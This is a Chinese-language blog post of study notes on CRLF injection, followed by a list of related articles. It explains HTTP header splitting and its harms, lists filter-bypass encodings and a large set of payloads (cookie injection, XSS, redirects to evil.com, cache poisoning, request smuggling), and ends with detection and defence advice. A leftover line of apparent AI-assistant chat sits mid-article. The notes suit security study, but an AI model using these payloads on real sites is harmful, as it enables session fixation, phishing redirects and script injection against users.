CRLF注入攻击学习笔记

最新推荐文章于 2025-06-07 09:02:04 发布
原创 最新推荐文章于 2025-06-07 09:02:04 发布 · 774 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习 #笔记 #网络

一、CRLF注入基础概念

1.1 什么是CRLF

CRLF(Carriage Return Line Feed)是一个由两个特殊字符组成的字符序列:

  • CR(回车符 \r,ASCII 13):将光标移动到当前行的开始位置
  • LF(换行符 \n,ASCII 10):将光标移动到下一行

这两个字符在HTTP协议中具有特殊的意义,它们共同构成了HTTP头部字段之间的分隔符。

1.2 CRLF注入的本质

CRLF注入是一种Web安全漏洞,其核心原理是攻击者通过向应用程序注入意外的回车符(CR)和换行符(LF),从而操纵HTTP响应的结构。这种漏洞通常发生在应用程序未能正确处理用户输入的情况下,特别是当这些输入被用于构造HTTP响应头时。

二、CRLF注入的危害分析

2.1 主要危害类型

2.1.1 会话固定攻击

会话固定是CRLF注入最危险的利用方式之一。通过注入额外的Set-Cookie头,攻击者可以:

  • 强制设置受害者的会话标识符
  • 植入恶意Cookie
  • 覆盖或修改现有的会话信息

例如,一个正常的HTTP响应头可能是:

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionid=abc123

而通过CRLF注入,攻击者可以注入额外的Cookie:

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionid=value
Set-Cookie: admin=true
2.1.2 跨站脚本攻击(XSS)

CRLF注入可以通过以下方式促成XSS攻击:

  • 禁用XSS保护机制
  • 注入新的响应体
  • 修改内容类型
  • 插入恶意JavaScript代码

具体实现方式:

  1. 通过注入禁用X-XSS-Protection头
  2. 重写响应体内容
  3. 插入HTML/JavaScript payload
2.1.3 开放重定向

攻击者可以通过注入Location头来实现强制重定向:

注入内容:%0d%0aLocation: http://malicious-site.com

这种攻击可能导致:

  • 用户被重定向到钓鱼网站
  • 绕过同源策略限制
  • 实施进一步的社会工程学攻击

2.2 二次危害效应

2.2.1 缓存中毒

当CRLF注入的响应被缓存服务器缓存时,可能导致:

  • 错误内容被存储在缓存中
  • 影响多个用户
  • 持续性的安全威胁
2.2.2 响应拆分

HTTP响应拆分可能导致:

  • 信息泄露
  • 响应混淆
  • 安全机制绕过

三、CRLF注入及绕过技巧

3.1 常见防护措施

3.1.1 输入验证
  • 严格过滤CR和LF字符
  • 验证HTTP头部字段值
  • 实施白名单验证
  • 使用正则表达式过滤特殊字符
  • 实现请求参数规范化处理
  • 建立输入长度限制
3.1.2 编码控制
  • 确保输出正确编码
  • 使用适当的转义机制
  • 实施严格的字符集控制
  • 统一字符编码标准
  • 使用安全的编码库进行处理
  • 对特殊字符进行HTML实体编码

3.2 绕过技术

3.2.1 UTF-8字符编码绕过

根据RFC 7230规范,HTTP头部字段值通常仅使用US-ASCII字符集的子集。然而,某些浏览器(如Firefox)在处理cookie时会对超出范围的字符进行特殊处理。以下是一些可用于绕过的UTF-8字符:

UTF-8字符十六进制Unicode转换结果
%E5%98%8A\u560a%0A (\n)
%E5%98%8D\u560d%0D (\r)
%E5%98%BE\u563e%3E (>)
%E5%98%BC\u563c%3C (<)
3.2.2 多层编码绕过

  1. URL编码技巧:

    • 双重URL编码:对特殊字符进行两次URL编码
    • 混合编码:组合使用不同编码方式
    • 字符集编码:利用不同字符集的编码特性

  2. 协议级别绕过:

    • HTTP/2请求拆分
    • 利用传输层协议特性
    • 利用内容编码机制

  3. 浏览器解析差异:

    • 利用不同浏览器的解析行为
    • 利用浏览器的容错机制
    • 利用字符集推断机制
3.2.3 高级绕过技术
  1. 分块传输编码绕过:
Transfer-Encoding: chunked
Content-Length: 5

0\r\n
\r\n
GET /admin HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
  1. 压缩编码绕过:
  • 利用gzip压缩中的特殊字符
  • 利用压缩算法的特性
  • 结合其他编码方式
  1. 自定义协议头绕过:
X-Custom-Header: value%0d%0aSet-Cookie: malicious=true

让我帮你在第三节中添加一个新的小节,专门介绍各种CRLF注入的攻击载荷(Payloads):

3.3 CRLF注入攻击载荷

3.3.1 基础注入技术
  1. 标准换行符注入:
/%0d%0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
  1. 双重编码注入:
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
  1. 目录遍历结合注入:
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
3.3.2 高级注入技术
  1. 特殊字符组合:
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
  1. Unicode编码注入:
/%u000aSet-Cookie:crlf=injection
  1. 问号参数注入:
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
3.3.3 复合攻击载荷
  1. XSS结合CRLF:
/%0d%0aContent-Type:text/html%0d%0a%0d%0a<script>alert('XSS')</script>
  1. 响应头注入:
/%0d%0aX-XSS-Protection:0%0d%0aContent-Type:text/html%0d%0a%0d%0a<script>alert('XSS')</script>
  1. 多重头部注入:
/%0d%0aSet-Cookie:session=123%0d%0aLocation:https://evil.com%0d%0a
3.3.4 上下文相关攻击
  1. 重定向结合注入:
/redirect?url=/%0d%0aLocation:https://evil.com%0d%0a
  1. 缓存投毒:
/%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type:text/html%0d%0aContent-Length:35%0d%0a%0d%0a<script>alert(document.domain)</script>
  1. 头部覆盖:
/%0d%0aX-Original-URL:%20javascript:alert(document.domain)
3.3.5 绕过技巧组合
  1. 多层编码组合:
/%25%25%30%61Set-Cookie:crlf=injection
/%25%25%30aSet-Cookie:crlf=injection
  1. 路径遍历结合编码:
/%2e%2e%2f%25%30%61Set-Cookie:crlf=injection
/%2f%2e%2e%25%30aSet-Cookie:crlf=injection
  1. 特殊字符混合编码:
/%23%25%30%61Set-Cookie:crlf=injection
/%3f%25%30aSet-Cookie:crlf=injection

四、CRLF注入的检测与防御

4.1 检测方法

4.1.1 自动化扫描
  • 使用专业的Web安全扫描器
  • 实施持续性安全测试
  • 编写自定义检测脚本
4.1.2 手动测试
  • 测试所有用户输入点
  • 验证HTTP响应处理
  • 检查头部注入可能性

4.2 防御策略

4.2.1 代码层面防御

  1. 输入验证:

    • 实施严格的输入验证
    • 使用安全的API
    • 实现规范化处理

  2. 输出编码:

    • 对所有输出进行适当编码
    • 使用安全的编码库
    • 实施内容安全策略(CSP)
4.2.2 架构层面防御

  1. Web服务器配置:

    • 正确配置HTTP头部
    • 实施适当的安全头
    • 使用现代Web服务器特性

  2. WAF防护:

    • 配置Web应用防火墙规则
    • 实施请求过滤
    • 监控异常请求
4.2.3 运维层面防御

  1. 监控与日志:

    • 实施全面的日志记录
    • 建立异常检测机制
    • 定期安全审计

  2. 更新与补丁:

    • 及时更新系统组件
    • 修补已知漏洞
    • 定期安全评估

v信搜索【赛博小生】,获取最新文章分享!

darkb1rd
关注
Web渗透(一)CRLF注入简介
weixin_39157582的博客
08-21 6519
CRLF注入简介1、基础知识2、原理分析3、漏洞挖掘4、防御手段5、CRLF Payload: 1、基础知识 HTTP报文结构 从上图可以看到:HTTP报文由三部分组成:状态行、首部、主体。 可以看到状态行和首部中的每行都是以回车符(\r,%0d,CR)和换行符(\n,%0a,LF)结束。 十六进制编码分别为0x0d和0x0a,URL编码为%0D和%0A 这是因为HTTP规范中行应该使用CRLF结束。另外,首部和主体由两个CRLF分隔。 2、原理分析 CRLF是 “ 回车+换行 ”(\r\n)的简称。
CRLF注入攻击原理和防范措施
lgdbk的专栏
06-19 1014
CRLF注入攻击并没有像其它类型的攻击那样著名。但是,当对有安全漏洞的应用程序实施CRLF注入攻击时,这种攻击对于攻击者同样有效,并且对用户造成极大的破坏。让我们看看这些应用程序攻击是如何实施的和你能够采取什么措施保护你的机构。 CRLF的含义是“carriage return/line feed”,意思就是回车。这是两个ASCII字符,分别排在第十三和第十位。CR和LF是在计算机终端还是电传
Web Hacking 101 中文版 七、CRLF 注入
热门推荐
龙哥盟
03-23 3万+
七、CRLF 注入 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 CRLF 注入是一类漏洞,在用户设法向应用插入 CRLF 时出现。在多种互联网协议中,包括 HTML,CRLF 字符表示了行的末尾,通常表示为\r\n,编码后是%0D%0A。在和 HTTP 请求或响应头组合时,这可以用于表示一行的结束,并且可能导致不同的漏洞,包括 HTT
深入解析CRLF注入技术:从基础到实战
最新发布
gitblog_00690的博客
06-07 447
深入解析CRLF注入技术:从基础到实战 什么是CRLF注入技术 CRLF(Carriage Return Line Feed)注入技术,也称为HTTP响应拆分技术,是一种利用Web应用程序对用户输入处理不当的技术。CRLF指的是回车(Carriage Return,%0d)和换行(Line Feed,%0a)这两个特殊字符,它们在HTTP协议中用于分隔头部字段。 当Web应用程序未能正确过滤用户输...
CRLF注入攻击
weixin_30561177的博客
03-30 1447
原理:http数据包通过\r\n\r\n来分开http header何http body 实现:首先这种攻击发生在应用层,且发生在服务器返回给我们的http reponse没有经过敏感字符的过滤,我们能够构造攻击语句来控制服务器的http响应.以下为例子: 1、Twitter的HTTP响应拆分 难度:高 厂商:https://twitter.com/ 报告地址:http...
CRLF注入(HTTP响应拆分-截断)
m0_51468027的博客
03-27 5443
2023年HW厂商斗象面试题——CRLF注入
HTTP CRLF注入攻击
2404_88048702的博客
11-15 1563
CRLF注入是一种利用`Carriage Return`(`\r`)和`Line Feed`(`\n`)字符的注入攻击,常见于HTTP响应拆分攻击。了解和防御这种攻击对维护Web应用的安全至关重要。通过严格验证用户输入,使用安全库,正确设置响应头的内容类型等方法,可以有效防止CRLF注入相关的安全漏洞。
OWASP WebGoat---安全测试学习笔记(十)---注入缺陷
某技术爱好者的专栏
10-24 3287
OWASP WebGoat---安全测试学习笔记(十)---注入缺陷
Metasploit渗透测试指南学习笔记
Destinylang的博客
01-20 1189
第一章 渗透测试技术基础 渗透测试执行标准 http://www.pentest-standard.org/index.php/Main_Page 技术指南 http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines 1.1 PTES中的渗透测试阶段 1.1.1 前期交互阶段 通常是你与客户组织进行讨论,来确定渗透测试的范...
学习笔记:WEB安全防护
TKE_yinian的博客
03-11 3015
WEB安全防护WEB基础HTTP工作流程:HTTP报文请求HTTP响应报文Cookie和SessionWEB攻击浅析sql的防范方法XSS分类跨站请求伪造CSRFURL过滤URL匹配恶意URL检测WEB信誉根据信誉分类WEB应用系统防护纵深安全防护自学习建模及白名单防护技术高性能检测技术防篡改技术自动侦测应用技术高速缓存技术WAF部署模式 WEB基础 • Internet采用超文本和超媒体的组合方...
《白帽子讲web安全》学习笔记——web安全概述
a2562614613的博客
08-28 937
一、安全的三要素 1、机密性 机密性要求保护数据内容不被泄露,加密是实现机密性要求的常见方法,比如常见的对称加密算法和非堆成加密算法。 2、完整性 完整性要求保护数据内容是完整的,没有被篡改,常见的保证一致性的技术手段是数据签名。 3、可用性 可用性要求保护资源是“随需而得”。安全领域中,拒绝服务攻击破坏得就职安全的可用应。 安全领域中,除以上要素外,仍然存在一些其他要素,比如不可抵赖性、可审计性,但最重要的要素便是以上三个。在...
CRLF注入
qq_41232519的博客
07-06 622
1、 漏洞简介及成因 CRLF时“回车+换行”(\r\n)的简称。 HTTP Header与HTTP Body时用两个CRLF分隔的,浏览器根据两个CRLF来取出HTTP内容并显示出来。 通过控制HTTP消息头中的字符,注入一些恶意的换行,就能注入一些会话cookie或者html代码,由于Nginx配置不正确,导致注入的代码会被执行。 2、 漏洞复现 访问页面,抓包 请求加上/%0d%0a%0d%0a<img src=1 onerror=alert(/xss/)> 由于页面重定向,并没有弹窗。
注入攻击CRLF
xnvyou_的博客
06-22 816
CRLF实际上是两个字符\r(十六进制编码:0x0d) \n(0x0a) 在日志文件中可伪造日志记录 def log_failed_login(username) log=open("access.log",'a') log.write("User login failed for: %s\n" % username) log.close() 在正常情况下,会记录如下日志: Use...
CRLF注入攻击与防御
鹤啸九天
08-28 4251
一、概念: CRLF的概念源自打字机,表明行的结束,转译字符是\r\n,计算机出现后沿用了这个概念。 CR:回车符的MCS字符,转译字符是\r,ASCII码十进制是13,ASCII码十六进制是0D; LF:换行符的MCS字符,转译字符是\n,ASCII码十进制是10,ASCII码十六进制是0A; 回车符可以让光标移到当前行的开...
CRLF注入漏洞(响应截断)攻击实战
12-28 1万+
CRLF是CR和LF两个字符的拼接,它们分别代表”回车+换行”(\r\n)。CRLF可以深度利用,造成反射型XSS攻击,会话固定等漏洞。CRLF造成XSS漏洞。
CRLF 注入攻击介绍和防范
han_code的博客
05-15 7066
目录 1、什么是CRLF攻击 2、CRLF注入的关键概念 3、通过实例解释CRLF注射 4、CRLF注入的修复建议 1、什么是CRLF攻击 CRLF的含义是“carriage return/line feed”,意思就是回车和换行。这是两个ASCII字符,分别排在第十三和第十位。 CRLF指的是特殊字符元素“回车”和“换行”。这些元素嵌入在HTTP标头和其他软件代码中,以...
CRLF注入(HTTP响应拆分-截断),2024大厂网络安全面试经历
m0_60388292的博客
04-17 938
利用docker搭建vulhub靶场,进入。
CRLF注入与检测
无痕的博客
01-03 3270
CRLF注入漏洞的介绍与检测
CRLF注入攻击代码例子
03-05
抱歉,我可以回答这个问题。CRLF注入攻击是一种利用Web应用程序中的CRLF(回车换行)字符漏洞,向HTTP响应头中注入恶意代码的攻击方式。以下是一个CRLF注入攻击的代码例子: GET /index.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5. (Windows NT 10.; Win64; x64; rv:58.) Gecko/20100101 Firefox/58. Accept: text/html,application/xhtml+xml,application/xml;q=.9,*/*;q=.8 Referer: http://example.com/index.php?page=1 Cookie: PHPSESSID=123456789abcdef Connection: close 攻击者可以在Referer字段中注入CRLF字符,从而在HTTP响应头中插入任意的恶意代码。这种攻击方式可以导致跨站脚本攻击(XSS)和跨站请求伪造(CSRF)等安全问题。因此,Web应用程序开发者应该注意防范CRLF注入攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值